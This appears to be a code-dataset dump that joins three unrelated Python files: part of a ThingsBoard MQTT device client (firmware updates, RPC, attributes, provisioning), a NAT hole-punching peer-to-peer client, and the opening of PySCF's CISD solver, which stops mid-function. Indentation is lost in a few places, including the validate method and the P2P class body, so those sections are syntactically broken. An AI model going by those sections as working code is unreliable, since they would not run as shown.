        log.debug('Getting chunk with number: %s. Chunk size is : %r byte(s).' % (self.__current_chunk, self.__chunk_size))
        if len(self.firmware_data) == self.__target_firmware_length:
            self.__process_firmware()
        else:
            self.__get_firmware()
    else:
        # Regular attribute update / RPC traffic.
        content = self._decode(message)
        self._on_decoded_message(self, content, message)
def __process_firmware(self):
    """Verify the downloaded image; on success flag it for the update thread,
    on checksum failure report FAILED and restart the metadata request."""
    self.current_firmware_info[FW_STATE_ATTR] = "DOWNLOADED"
    self.send_telemetry(self.current_firmware_info)
    time.sleep(1)
    verification_result = verify_checksum(self.firmware_data, self.firmware_info.get(FW_CHECKSUM_ALG_ATTR),
                                          self.firmware_info.get(FW_CHECKSUM_ATTR))
    if verification_result:
        log.debug('Checksum verified!')
        self.current_firmware_info[FW_STATE_ATTR] = "VERIFIED"
        self.send_telemetry(self.current_firmware_info)
        time.sleep(1)
    else:
        log.debug('Checksum verification failed!')
        self.current_firmware_info[FW_STATE_ATTR] = "FAILED"
        self.send_telemetry(self.current_firmware_info)
        self.__request_firmware_info()
        return
    # Picked up by __update_thread, which applies the update.
    self.firmware_received = True

def __get_firmware(self):
    """Request the next firmware chunk (empty payload = whole image).

    NOTE(review): the payload is '' (str) in the whole-image case but bytes
    otherwise -- paho accepts both, yet the inconsistency looks accidental.
    """
    payload = '' if not self.__chunk_size or self.__chunk_size > self.firmware_info.get(FW_SIZE_ATTR, 0) else str(
        self.__chunk_size).encode()
    self._client.publish(f"v2/fw/request/{self.__firmware_request_id}/chunk/{self.__current_chunk}",
                         payload=payload, qos=1)

def __on_firmware_received(self, version_to):
    """Persist the verified image to disk, named after the firmware title."""
    with open(self.firmware_info.get(FW_TITLE_ATTR), "wb") as firmware_file:
        firmware_file.write(self.firmware_data)
    log.info('Firmware is updated!\n Current firmware version is: %s' % version_to)

def __update_thread(self):
    """Daemon loop: when a verified image arrives, write it out, report the
    UPDATING -> UPDATED state transitions, and adopt the new title/version."""
    while True:
        if self.firmware_received:
            self.current_firmware_info[FW_STATE_ATTR] = "UPDATING"
            self.send_telemetry(self.current_firmware_info)
            time.sleep(1)
            self.__on_firmware_received(self.firmware_info.get(FW_VERSION_ATTR))
            self.current_firmware_info = {
                "current_" + FW_TITLE_ATTR: self.firmware_info.get(FW_TITLE_ATTR),
                "current_" + FW_VERSION_ATTR: self.firmware_info.get(FW_VERSION_ATTR),
                FW_STATE_ATTR: "UPDATED"
            }
            self.send_telemetry(self.current_firmware_info)
            self.firmware_received = False
        time.sleep(0.2)
@staticmethod
def _decode(message):
    """Decode an MQTT message payload as UTF-8 JSON and return the result."""
    content = loads(message.payload.decode("utf-8"))
    log.debug(content)
    log.debug(message.topic)
    return content
@staticmethod
def validate(validator, data):
try:
validator.validate(data)
except ValidationError as e:
log.error(e)
raise e
def _on_decoded_message(self, client, content, message):
    """Dispatch a decoded message by topic: server-side RPC requests,
    client-side RPC responses, attribute updates, or attribute responses."""
    if message.topic.startswith(RPC_REQUEST_TOPIC):
        # Server-side RPC: the request id is the topic suffix (kept as str).
        request_id = message.topic[len(RPC_REQUEST_TOPIC):len(message.topic)]
        if self.__device_on_server_side_rpc_response:
            self.__device_on_server_side_rpc_response(client, request_id, content)
    elif message.topic.startswith(RPC_RESPONSE_TOPIC):
        with self._lock:
            request_id = int(message.topic[len(RPC_RESPONSE_TOPIC):len(message.topic)])
            # pop: each client-side RPC callback fires exactly once.
            callback = self.__device_client_rpc_dict.pop(request_id)
        callback(client, request_id, content, None)
    elif message.topic == ATTRIBUTES_TOPIC:
        dict_results = []
        with self._lock:
            # callbacks for everything
            if self.__device_sub_dict.get("*"):
                for subscription_id in self.__device_sub_dict["*"]:
                    dict_results.append(self.__device_sub_dict["*"][subscription_id])
            # specific callback
            keys = content.keys()
            keys_list = []
            for key in keys:
                keys_list.append(key)
            # iterate through message
            for key in keys_list:
                # find key in our dict
                if self.__device_sub_dict.get(key):
                    for subscription in self.__device_sub_dict[key]:
                        dict_results.append(self.__device_sub_dict[key][subscription])
        # Invoke collected callbacks outside the lock.
        for res in dict_results:
            res(client, content, None)
    elif message.topic.startswith(ATTRIBUTES_TOPIC_RESPONSE):
        with self._lock:
            req_id = int(message.topic[len(ATTRIBUTES_TOPIC + "/response/"):])
            # pop callback and use it
            callback = self._attr_request_dict.pop(req_id)
        callback(client, content, None)
def max_inflight_messages_set(self, inflight):
    """Set the maximum number of messages with QoS>0 that can be part way through their network flow at once.
    Defaults to 20. Increasing this value will consume more memory but can increase throughput."""
    # Thin delegation to the underlying paho client.
    self._client.max_inflight_messages_set(inflight)

def max_queued_messages_set(self, queue_size):
    """Set the maximum number of outgoing messages with QoS>0 that can be pending in the outgoing message queue.
    Defaults to 0. 0 means unlimited. When the queue is full, any further outgoing messages would be dropped."""
    self._client.max_queued_messages_set(queue_size)

def reconnect_delay_set(self, min_delay=1, max_delay=120):
    """The client will automatically retry connection. Between each attempt it will wait a number of seconds
    between min_delay and max_delay. When the connection is lost, initially the reconnection attempt is delayed
    of min_delay seconds. It’s doubled between subsequent attempt up to max_delay. The delay is reset to min_delay
    when the connection complete (e.g. the CONNACK is received, not just the TCP connection is established)."""
    self._client.reconnect_delay_set(min_delay, max_delay)
def send_rpc_reply(self, req_id, resp, quality_of_service=None, wait_for_publish=False):
    """Publish a reply to a server-side RPC request.

    :param req_id: request id received with the RPC request (string).
    :param resp: serialized response payload.
    :param quality_of_service: QoS override; defaults to the client's QoS.
    :param wait_for_publish: block until the reply is actually published.
    """
    if quality_of_service is None:
        quality_of_service = self.quality_of_service
    if quality_of_service not in (0, 1):
        log.error("Quality of service (qos) value must be 0 or 1")
        return None
    publish_info = self._client.publish(RPC_RESPONSE_TOPIC + req_id, resp, qos=quality_of_service)
    if wait_for_publish:
        publish_info.wait_for_publish()
def send_rpc_call(self, method, params, callback):
    """Send a client-side RPC request; *callback* receives the response.

    :param method: RPC method name.
    :param params: RPC parameters (validated against the client-RPC schema).
    :param callback: called as callback(client, request_id, content, None).
    """
    self.validate(RPC_VALIDATOR, params)
    with self._lock:
        self.__device_client_rpc_number += 1
        self.__device_client_rpc_dict.update({self.__device_client_rpc_number: callback})
        rpc_request_id = self.__device_client_rpc_number
    payload = {"method": method, "params": params}
    self._client.publish(RPC_REQUEST_TOPIC + str(rpc_request_id),
                         dumps(payload),
                         qos=self.quality_of_service)

def set_server_side_rpc_request_handler(self, handler):
    """Register the handler invoked for incoming server-side RPC requests."""
    self.__device_on_server_side_rpc_response = handler
def publish_data(self, data, topic, qos):
    """JSON-encode *data* and publish it to *topic*.

    :param qos: QoS level 0 or 1, or None for the client default.
    :raises TBQoSException: if qos is not 0 or 1.
    :return: TBPublishInfo wrapping the paho publish result.
    """
    payload = dumps(data)
    if qos is None:
        qos = self.quality_of_service
    if qos not in (0, 1):
        log.exception("Quality of service (qos) value must be 0 or 1")
        raise TBQoSException("Quality of service (qos) value must be 0 or 1")
    return TBPublishInfo(self._client.publish(topic, payload, qos))
def send_telemetry(self, telemetry, quality_of_service=None):
    """Validate and publish telemetry (a dict or a list of dicts)."""
    quality_of_service = quality_of_service if quality_of_service is not None else self.quality_of_service
    # The telemetry topic always takes a list of entries.
    if not isinstance(telemetry, list):
        telemetry = [telemetry]
    self.validate(DEVICE_TS_OR_KV_VALIDATOR, telemetry)
    return self.publish_data(telemetry, TELEMETRY_TOPIC, quality_of_service)

def send_attributes(self, attributes, quality_of_service=None):
    """Publish client-side attributes (no schema validation is applied)."""
    quality_of_service = quality_of_service if quality_of_service is not None else self.quality_of_service
    return self.publish_data(attributes, ATTRIBUTES_TOPIC, quality_of_service)
def unsubscribe_from_attribute(self, subscription_id):
    """Remove an attribute subscription by id; '*' removes all of them."""
    with self._lock:
        for attribute in self.__device_sub_dict:
            if self.__device_sub_dict[attribute].get(subscription_id):
                del self.__device_sub_dict[attribute][subscription_id]
                log.debug("Unsubscribed from %s, subscription id %i", attribute, subscription_id)
        # NOTE(review): ids handed out by subscribe_to_attribute are ints, so
        # '*' here only matches when the caller passes the literal string.
        if subscription_id == '*':
            self.__device_sub_dict = {}
        # Drop attribute keys whose subscription dict became empty.
        self.__device_sub_dict = dict((k, v) for k, v in self.__device_sub_dict.items() if v)
def subscribe_to_all_attributes(self, callback):
    """Subscribe *callback* to every shared-attribute update ('*' key)."""
    return self.subscribe_to_attribute("*", callback)

def subscribe_to_attribute(self, key, callback):
    """Subscribe *callback* to updates of the shared attribute *key*.

    :return: integer subscription id usable with unsubscribe_from_attribute.
    """
    with self._lock:
        self.__device_max_sub_id += 1
        if key not in self.__device_sub_dict:
            self.__device_sub_dict.update({key: {self.__device_max_sub_id: callback}})
        else:
            self.__device_sub_dict[key].update({self.__device_max_sub_id: callback})
        log.debug("Subscribed to %s with id %i", key, self.__device_max_sub_id)
        return self.__device_max_sub_id
def request_attributes(self, client_keys=None, shared_keys=None, callback=None):
    """Request client-side and/or shared attributes from the platform.

    :param client_keys: iterable of client attribute names, or None.
    :param shared_keys: iterable of shared attribute names, or None.
    :param callback: called with the response (or a TBTimeoutException after
        30 seconds without one).
    :return: False when no keys were given, otherwise the paho publish info.
    """
    if client_keys is None and shared_keys is None:
        log.error("There are no keys to request")
        return False
    msg = {}
    if client_keys:
        msg["clientKeys"] = ",".join(client_keys)
    if shared_keys:
        msg["sharedKeys"] = ",".join(shared_keys)
    ts_in_millis = int(round(time.time() * 1000))
    attr_request_number = self._add_attr_request_callback(callback)
    # FIX: publish with the id that was just registered for the callback.
    # The original re-read self.__attr_request_number outside the lock, so a
    # concurrent request could bump it first and the response would then be
    # routed to the wrong callback.
    info = self._client.publish(topic=ATTRIBUTES_TOPIC_REQUEST + str(attr_request_number),
                                payload=dumps(msg),
                                qos=self.quality_of_service)
    # Arm a 30-second timeout for the response.
    self._add_timeout(attr_request_number, ts_in_millis + 30000)
    return info
def _add_timeout(self, attr_request_number, timestamp):
    """Queue a deadline (ms since epoch) for an attribute request; the
    __timeout_check thread fires the callback if it is still pending then."""
    self.__timeout_queue.put({"ts": timestamp, "attribute_request_id": attr_request_number})

def _add_attr_request_callback(self, callback):
    """Register *callback* under a fresh attribute-request id and return it."""
    with self._lock:
        self.__attr_request_number += 1
        self._attr_request_dict.update({self.__attr_request_number: callback})
        attr_request_number = self.__attr_request_number
    return attr_request_number
def __timeout_check(self):
    """Daemon loop: wait until each queued deadline passes, then fire the
    associated callback with TBTimeoutException -- but only if it is still
    registered (i.e. no response arrived in the meantime)."""
    while not self.stopped:
        if not self.__timeout_queue.empty():
            item = self.__timeout_queue.get_nowait()
            if item is not None:
                # Busy-wait (1 ms steps) until the deadline passes.
                while not self.stopped:
                    current_ts_in_millis = int(round(time.time() * 1000))
                    if current_ts_in_millis > item["ts"]:
                        break
                    time.sleep(0.001)
                with self._lock:
                    callback = None
                    # pop => a callback that already ran is not re-fired.
                    if item.get("attribute_request_id"):
                        if self._attr_request_dict.get(item["attribute_request_id"]):
                            callback = self._attr_request_dict.pop(item["attribute_request_id"])
                    elif item.get("rpc_request_id"):
                        if self.__device_client_rpc_dict.get(item["rpc_request_id"]):
                            callback = self.__device_client_rpc_dict.pop(item["rpc_request_id"])
                if callback is not None:
                    callback(self, None, TBTimeoutException("Timeout while waiting for a reply from ThingsBoard!"))
        else:
            time.sleep(0.01)
def claim(self, secret_key, duration=30000):
    """Publish a device-claiming request.

    :param secret_key: claiming secret configured on the platform.
    :param duration: claiming window in milliseconds.
    :return: TBPublishInfo for the claim publish.
    """
    claiming_request = {
        "secretKey": secret_key,
        "durationMs": duration
    }
    info = TBPublishInfo(self._client.publish(CLAIMING_TOPIC, dumps(claiming_request), qos=self.quality_of_service))
    return info
@staticmethod
def provision(host,
              provision_device_key,
              provision_device_secret,
              port=1883,
              device_name=None,
              access_token=None,
              client_id=None,
              username=None,
              password=None,
              hash=None):
    """Provision a new device and return the credentials ThingsBoard issued.

    Exactly one credential style is sent, checked in this order: access
    token, MQTT basic (username/password/client id), or X.509 hash.

    NOTE(review): the ``hash`` parameter shadows the builtin; it is part of
    the public keyword interface, so it is left unchanged.

    :return: the "credentialsValue" from the platform, or None on failure.
    """
    provision_request = {
        "provisionDeviceKey": provision_device_key,
        "provisionDeviceSecret": provision_device_secret
    }
    if access_token is not None:
        provision_request["token"] = access_token
        provision_request["credentialsType"] = "ACCESS_TOKEN"
    elif username is not None or password is not None or client_id is not None:
        provision_request["username"] = username
        provision_request["password"] = password
        provision_request["clientId"] = client_id
        provision_request["credentialsType"] = "MQTT_BASIC"
    elif hash is not None:
        provision_request["hash"] = hash
        provision_request["credentialsType"] = "X509_CERTIFICATE"
    if device_name is not None:
        provision_request["deviceName"] = device_name
    provisioning_client = ProvisionClient(host=host, port=port, provision_request=provision_request)
    provisioning_client.provision()
    return provisioning_client.get_credentials()
|
P2PClientForServer.py | import json
import threading
import requests
import socket
from requests.adapters import HTTPAdapter
from urllib3.poolmanager import PoolManager
import asyncio
import websockets
import time
from threading import Thread
class SourcePortAdapter(HTTPAdapter):
    """"Transport adapter" that allows us to set the source port."""

    def __init__(self, port, *args, **kwargs):
        # Local TCP source port every outgoing connection will bind to.
        self._source_port = port
        super(SourcePortAdapter, self).__init__(*args, **kwargs)

    def init_poolmanager(self, connections, maxsize, block=False):
        # '' lets the OS pick the local address; only the port is pinned,
        # which is what makes TCP hole punching possible.
        self.poolmanager = PoolManager(
            num_pools=connections, maxsize=maxsize,
            block=block, source_address=('', self._source_port))
def get_host_ip():
    """Return the local IP address used for outbound traffic.

    Connects a UDP socket towards a public address and reads back the
    source address the OS selected for that route.
    """
    probe = None
    try:
        probe = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        probe.connect(('8.8.8.8', 80))
        ip = probe.getsockname()[0]
    finally:
        if probe is not None:
            probe.close()
    return ip
class P2PClientManagement(object):
def __init__(self, server, client_id, local_ip, local_listen_port):
    """
    :param server: base URL of the p2p coordination server.
    :param client_id: unique id this client registers under.
    :param local_ip: local IP address to bind/report.
    :param local_listen_port: local TCP port to bind/report (hole punching
        requires reusing this exact source port).
    """
    # Session whose outgoing connections are pinned to local_listen_port.
    self.httpsession_with_source_port = requests.session()
    self.httpsession_with_source_port.mount("http://", SourcePortAdapter(local_listen_port))
    # Ordinary session for requests that do not need a fixed source port.
    self.httpsession = requests.session()
    self.local_ip = local_ip
    self.local_listen_port = local_listen_port
    self.client_id = client_id
    self.server = server
    self.register_p2pinfo_thread_stop_flag = False
    self.p2p_websocket_client = None
    self.last_connect_time = 0
    # Serializes all uses of the pinned source port.
    self.connect_lock = threading.Lock()
    # Minimum interval between two requests reusing the same TCP source
    # port, to avoid port-reuse errors.
    self.tcp_connect_with_same_source_port_interval = 0.5

def __del__(self):
    self.httpsession_with_source_port.close()
    self.httpsession.close()
def register_p2pinfo(self):
    """Register this client's internal address with the coordination server,
    using the pinned source port so the NAT mapping stays alive."""
    p2pinfo_dict = {
        "client_id": self.client_id,
        "ip_inside": self.local_ip,
        "port_inside": self.local_listen_port
    }
    self.connect_lock.acquire()
    # If called too soon, the previous TCP connection may not have fully
    # closed yet and reusing the port would fail -- enforce the interval.
    interval = time.time() - self.last_connect_time
    if interval < self.tcp_connect_with_same_source_port_interval:
        time.sleep(self.tcp_connect_with_same_source_port_interval - interval)
    try:
        # Best effort: registration is retried by register_p2pinfo_forever.
        self.httpsession_with_source_port.post(self.server + "/p2pinfo/register", json=p2pinfo_dict)
    except Exception as why:
        print('except:', why)
    self.last_connect_time = time.time()
    self.connect_lock.release()
def get_subscribe_p2pinfo_server(self):
    """Ask the coordination server which host serves the websocket
    subscription endpoint; returns the decoded JSON (expects ip/port keys)."""
    result = self.httpsession.get(self.server + "/p2pinfo/subscribe/server")
    print(result.status_code, result.content)
    content_dict = json.loads(result.content)
    return content_dict
async def handle_p2p_msg(self, websocket_client):
    """Receive one message from the subscribe websocket and service it.

    A 'connect' command performs a TCP hole punch: a short outbound connect
    from the pinned local port towards the requested peer address, then the
    outcome is reported back over the websocket.
    """
    message = await websocket_client.recv()
    message_dict = json.loads(message)
    if message_dict['cmd'] == 'connect':
        client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Only the outgoing packet matters for hole punching; no need to
        # wait for the peer, so use a 0.01 s timeout.
        client.settimeout(0.01)
        self.connect_lock.acquire()
        # The previous connection on this port may not have fully closed;
        # wait out the reuse interval to avoid a bind/connect error.
        interval = time.time() - self.last_connect_time
        if interval < self.tcp_connect_with_same_source_port_interval:
            time.sleep(self.tcp_connect_with_same_source_port_interval - interval)
        client.bind((self.local_ip, self.local_listen_port))
        try:
            client.connect((message_dict['ip'], message_dict['port']))
            message_dict["result"] = "success"
        except Exception as why:
            print('except:', why)
            message_dict["result"] = "failed"
        finally:
            if "result" not in message_dict:
                message_dict["result"] = "failed"
            client.close()
            await websocket_client.send(json.dumps(message_dict))
            print("connect cmd handle end, %s:%d connect %s:%d"
                  % (self.local_ip, self.local_listen_port, message_dict['ip'], message_dict['port']))
            self.last_connect_time = time.time()
            self.connect_lock.release()
    else:
        # Unknown command: report failure back to the server.
        message_dict["result"] = "failed"
        message_dict["info"] = "not support"
        await self.p2p_websocket_client.send(json.dumps(message_dict))
async def subscribe_p2pinfo(self):
    """Subscribe to p2p connect requests over a websocket and service them
    until the connection closes.

    Reconnects (and re-registers) when there is no open websocket, then
    alternates between waiting for the socket to close and handling the
    next p2p message.

    :raises Exception: if the server does not acknowledge registration.
    """
    p2p_subscribe_server_host = self.get_subscribe_p2pinfo_server()
    if self.p2p_websocket_client is None or self.p2p_websocket_client.closed is True:
        url = f'ws://{p2p_subscribe_server_host["ip"]}:{p2p_subscribe_server_host["port"]}/p2pinfo/subscribe'
        print("reconnect", url)
        self.p2p_websocket_client = await websockets.connect(url, ping_interval=10)
        # Register this client on the fresh connection.
        await self.p2p_websocket_client.send(
            "{\"cmd\": \"register\", \"client_id\": \"%s\", \"type\": \"server\"}" % self.client_id)
        message = await self.p2p_websocket_client.recv()
        message_dict = json.loads(message)
        # FIX: the original condition `"result" not in message_dict and
        # message_dict["result"] != "success"` raised KeyError when "result"
        # was missing and silently accepted a present-but-failed result.
        if message_dict.get("result") != "success":
            raise Exception("p2pinfo subscribe failed, response msg: %s" % message)
    wait_closed_task = asyncio.ensure_future(
        self.p2p_websocket_client.wait_closed())
    wait_p2p_notify_task = asyncio.ensure_future(
        self.handle_p2p_msg(self.p2p_websocket_client))
    while 1:
        done, pending = await asyncio.wait(
            [wait_closed_task, wait_p2p_notify_task],
            return_when=asyncio.FIRST_COMPLETED,
        )
        if wait_closed_task in done:
            print("websocket /p2pinfo/subscribe client closed")
            # Cancel the still-pending message handler.
            for task in pending:
                task.cancel()
            # Websocket disconnected: return and let the caller reconnect.
            return
        else:
            # A p2p request was handled; queue up the next one.
            wait_p2p_notify_task = asyncio.ensure_future(
                self.handle_p2p_msg(self.p2p_websocket_client))
def register_p2pinfo_forever(self):
# 每隔5秒使用50300端口重新注册, 避免外部nat端口被回收,已测试10秒会被回收
while self.register_p2pinfo_thread_stop_flag is not True:
self.register_p2pinfo()
time.sleep(5)
self.register_p2pinfo_thread_stop_flag = False
    def register_p2pinfo_forever_stop(self):
        # Ask register_p2pinfo_forever() to stop: the loop checks this flag
        # before each re-registration and clears it again on exit.
        self.register_p2pinfo_thread_stop_flag = True
if __name__ == '__main__':
    # Load the client settings. `with` guarantees the handle is closed even
    # if the JSON is malformed (the original leaked the file object then).
    with open('config.json', 'r') as config_file:
        config_dict = json.load(config_file)
    CL = P2PClientManagement(config_dict["p2p_server_address"],
                             config_dict["p2p_client_id"],
                             get_host_ip(),
                             config_dict["local_server_port"])
    # Keep the NAT mapping alive from a background thread.
    t = Thread(target=CL.register_p2pinfo_forever)
    t.start()
    # Re-subscribe forever: subscribe_p2pinfo() returns on disconnect and
    # raises on other errors; wait 5 seconds between attempts.
    while True:
        try:
            asyncio.get_event_loop().run_until_complete(CL.subscribe_p2pinfo())
        except Exception as why1:
            print("/p2pinfo/subscribe exception: %s" % why1)
        time.sleep(5)
|
cisd.py | #!/usr/bin/env python
# Copyright 2014-2021 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Qiming Sun <osirpt.sun@gmail.com>
#
'''
Solve CISD equation H C = C e where e = E_HF + E_CORR
'''
from functools import reduce
import numpy
from pyscf import lib
from pyscf.lib import logger
from pyscf.cc import ccsd
from pyscf.cc import ccsd_rdm
from pyscf.fci import cistring
from pyscf import __config__
# Minimum block size for the blocked virtual-orbital loops; overridable
# through PySCF's __config__.
BLKMIN = getattr(__config__, 'ci_cisd_blkmin', 4)
def kernel(myci, eris, ci0=None, max_cycle=50, tol=1e-8, verbose=logger.INFO):
    '''
    Run CISD calculation.

    Args:
        myci : CISD (inheriting) object
        eris : ccsd._ChemistsERIs (inheriting) object (poss diff for df)
            Contains the various (pq|rs) integrals needed.

    Kwargs:
        ci0 : (List of) numpy array(s) (if None it will set)
            Initial guess for CISD coeffs.
        max_cycle : integer
            Maximum number of iterations to converge to CISD solution.
            If not converged before, calculation stops without having
            converged.
        tol : float
            Convergence tolerance.
        verbose : integer
            Level of output (roughly: the higher, the more output).

    Returns:
        conv : bool
            Is it converged?
        ecisd : List of floats or float
            The lowest :attr:`myci.nroots` eigenvalues.
        ci : List of 1D arrays or 1D array
            The lowest :attr:`myci.nroots` eigenvectors.
    '''
    log = logger.new_logger(myci, verbose)
    diag = myci.make_diagonal(eris)
    # Note that ehf is not the HF energy (see `make_diagonal`).
    ehf = diag[0]
    diag -= ehf

    if ci0 is None:
        ci0 = myci.get_init_guess(eris=eris, nroots=myci.nroots, diag=diag)[1]

    def op(xs):
        # Matrix-vector products H|x> for the Davidson solver.
        return [myci.contract(x, eris) for x in xs]

    def precond(x, e, *args):
        # Davidson preconditioner (H_diag - e + shift)^-1, guarded against
        # division by (near-)zero diagonal differences.
        diagd = diag - (e-myci.level_shift)
        diagd[abs(diagd)<1e-8] = 1e-8
        return x / diagd

    if myci._dot is not None:
        # Use the CISD-metric inner product (accounts for the permutation
        # redundancy in the doubles block) instead of the plain dot product.
        nmo = myci.nmo
        nocc = myci.nocc
        def cisd_dot(x1, x2):
            return myci._dot(x1, x2, nmo, nocc)
    else:
        cisd_dot = numpy.dot

    conv, ecisd, ci = lib.davidson1(op, ci0, precond, tol=tol,
                                    max_cycle=max_cycle, max_space=myci.max_space,
                                    lindep=myci.lindep, dot=cisd_dot,
                                    nroots=myci.nroots, verbose=log)
    if myci.nroots == 1:
        # Unwrap the single-root lists to plain scalars/arrays.
        conv = conv[0]
        ecisd = ecisd[0]
        ci = ci[0]
    return conv, ecisd, ci
def make_diagonal(myci, eris):
    '''
    Return diagonal of CISD hamiltonian in Slater determinant basis.

    Note that a constant has been subtracted from all elements.
    The first element is the HF energy (minus the
    constant), the next elements are the diagonal elements with singly
    excited determinants (<D_i^a|H|D_i^a> within the constant), then
    doubly excited determinants (<D_ij^ab|H|D_ij^ab> within the
    constant).

    Args:
        myci : CISD (inheriting) object
        eris : ccsd._ChemistsERIs (inheriting) object (poss diff for df)
            Contains the various (pq|rs) integrals needed.

    Returns:
        numpy array (size: (1, 1 + #single excitations from HF det
        + #double excitations from HF det))
            Diagonal elements of hamiltonian matrix within a constant,
            see above.
    '''
    # DO NOT use eris.mo_energy, it may differ to eris.fock.diagonal()
    mo_energy = eris.fock.diagonal()
    nmo = mo_energy.size
    jdiag = numpy.zeros((nmo,nmo))
    kdiag = numpy.zeros((nmo,nmo))
    nocc = eris.nocc
    nvir = nmo - nocc
    # Diagonal Coulomb (ii|jj) and exchange (ij|ji) integrals, blockwise.
    jdiag[:nocc,:nocc] = numpy.einsum('iijj->ij', eris.oooo)
    kdiag[:nocc,:nocc] = numpy.einsum('jiij->ij', eris.oooo)
    jdiag[:nocc,nocc:] = numpy.einsum('iijj->ij', eris.oovv)
    kdiag[:nocc,nocc:] = numpy.einsum('ijji->ij', eris.ovvo)
    if eris.vvvv is not None and len(eris.vvvv.shape) == 2:
        #:eris_vvvv = ao2mo.restore(1, eris.vvvv, nvir)
        #:jdiag1 = numpy.einsum('iijj->ij', eris_vvvv)
        # vvvv is tril-packed (2D); read the (aa|bb) elements directly from
        # the packed rows instead of unpacking the full 4-index tensor.
        diag_idx = numpy.arange(nvir)
        diag_idx = diag_idx * (diag_idx + 1) // 2 + diag_idx
        for i, ii in enumerate(diag_idx):
            jdiag[nocc+i,nocc:] = eris.vvvv[ii][diag_idx]

    jksum = (jdiag[:nocc,:nocc] * 2 - kdiag[:nocc,:nocc]).sum()
    # Note that ehf is not the HF energy.
    ehf = mo_energy[:nocc].sum() * 2 - jksum
    # Orbital-energy differences corrected by the diagonal J/K terms.
    e_ia = lib.direct_sum('a-i->ia', mo_energy[nocc:], mo_energy[:nocc])
    e_ia -= jdiag[:nocc,nocc:] - kdiag[:nocc,nocc:]
    e1diag = ehf + e_ia

    e2diag = lib.direct_sum('ia+jb->ijab', e_ia, e_ia)
    e2diag += ehf
    e2diag += jdiag[:nocc,:nocc].reshape(nocc,nocc,1,1)
    e2diag -= jdiag[:nocc,nocc:].reshape(nocc,1,1,nvir)
    e2diag -= jdiag[:nocc,nocc:].reshape(1,nocc,nvir,1)
    e2diag += jdiag[nocc:,nocc:].reshape(1,1,nvir,nvir)
    return numpy.hstack((ehf, e1diag.reshape(-1), e2diag.reshape(-1)))
def contract(myci, civec, eris):
    '''
    Application of CISD hamiltonian onto civec.

    Args:
        myci : CISD (inheriting) object
        civec : numpy array, same length as a CI vector.
        eris : ccsd._ChemistsERIs (inheriting) object (poss diff for df)
            Contains the various (pq|rs) integrals needed.

    Returns:
        numpy array, same length as a CI vector.
    '''
    time0 = logger.process_clock(), logger.perf_counter()
    log = logger.Logger(myci.stdout, myci.verbose)
    nocc = myci.nocc
    nmo = myci.nmo
    nvir = nmo - nocc
    c0, c1, c2 = myci.cisdvec_to_amplitudes(civec, nmo, nocc)

    # (vv|vv) contraction (possibly AO-driven); t2sym='jiba' exploits the
    # permutation symmetry t2[i,j,a,b] == t2[j,i,b,a].
    t2 = myci._add_vvvv(c2, eris, t2sym='jiba')
    t2 *= .5  # due to t2+t2.transpose(1,0,3,2) in the end
    log.timer_debug1('vvvv', *time0)

    foo = eris.fock[:nocc,:nocc].copy()
    fov = eris.fock[:nocc,nocc:].copy()
    fvv = eris.fock[nocc:,nocc:].copy()

    # Singles residual from the Fock matrix.
    t1 = fov * c0
    t1 += numpy.einsum('ib,ab->ia', c1, fvv)
    t1 -= numpy.einsum('ja,ji->ia', c1, foo)

    t2 += lib.einsum('kilj,klab->ijab', _cp(eris.oooo)*.5, c2)
    t2 += lib.einsum('ijac,bc->ijab', c2, fvv)
    t2 -= lib.einsum('kj,kiba->jiba', foo, c2)
    t2 += numpy.einsum('ia,jb->ijab', c1, fov)

    # Block over the virtual index to bound the memory footprint.
    unit = nocc*nvir**2 + nocc**2*nvir*3 + 1
    max_memory = max(0, myci.max_memory - lib.current_memory()[0])
    blksize = min(nvir, max(BLKMIN, int(max_memory*.9e6/8/unit)))
    log.debug1('max_memory %d MB, nocc,nvir = %d,%d blksize = %d',
               max_memory, nocc, nvir, blksize)
    for p0, p1 in lib.prange(0, nvir, blksize):
        eris_oVoV = _cp(_cp(eris.oovv[:,:,p0:p1]).transpose(0,2,1,3))
        tmp = lib.einsum('kbjc,ikca->jiba', eris_oVoV, c2)
        t2[:,:,p0:p1] -= tmp*.5
        t2[:,:,p0:p1] -= tmp.transpose(1,0,2,3)
        tmp = None

        eris_ovvo = _cp(eris.ovvo[:,p0:p1])
        t2[:,:,p0:p1] += eris_ovvo.transpose(0,3,1,2) * (c0*.5)
        t1 += numpy.einsum('ia,iabj->jb', c1[:,p0:p1], eris_ovvo) * 2
        t1[:,p0:p1] -= numpy.einsum('ib,iajb->ja', c1, eris_oVoV)

        ovov = -.5 * eris_oVoV
        ovov += eris_ovvo.transpose(3,1,0,2)
        eris_oVoV = None
        # theta is the spin-adapted combination 2*c2 - c2(ji,ab) for this
        # virtual block, with the blocked axis moved to the front.
        theta = c2[:,:,p0:p1].transpose(2,0,1,3) * 2
        theta-= c2[:,:,p0:p1].transpose(2,1,0,3)
        for j in range(nocc):
            t2[:,j] += lib.einsum('ckb,ckia->iab', ovov[j], theta)
        tmp = ovov = None

        t1 += numpy.einsum('aijb,ia->jb', theta, fov[:,p0:p1])

        eris_ovoo = _cp(eris.ovoo[:,p0:p1])
        t1 -= lib.einsum('bjka,jbki->ia', theta, eris_ovoo)
        t2[:,:,p0:p1] -= lib.einsum('jbik,ka->jiba', eris_ovoo.conj(), c1)
        eris_ovoo = None

        eris_ovvv = eris.get_ovvv(slice(None), slice(p0,p1)).conj()
        t1 += lib.einsum('cjib,jcba->ia', theta, eris_ovvv)
        t2[:,:,p0:p1] += lib.einsum('iacb,jc->ijab', eris_ovvv, c1)
        tmp = eris_ovvv = None

    #:t2 + t2.transpose(1,0,3,2)
    # Symmetrize t2 in place: t2[i,j,a,b] += t2[j,i,b,a].
    for i in range(nocc):
        if i > 0:
            t2[i,:i]+= t2[:i,i].transpose(0,2,1)
            t2[:i,i] = t2[i,:i].transpose(0,2,1)
        t2[i,i] = t2[i,i] + t2[i,i].T

    # Reference-coefficient residual <HF|H|c>.
    t0 = numpy.einsum('ia,ia->', fov, c1) * 2
    t0 += numpy.einsum('iabj,ijab->', eris.ovvo, c2) * 2
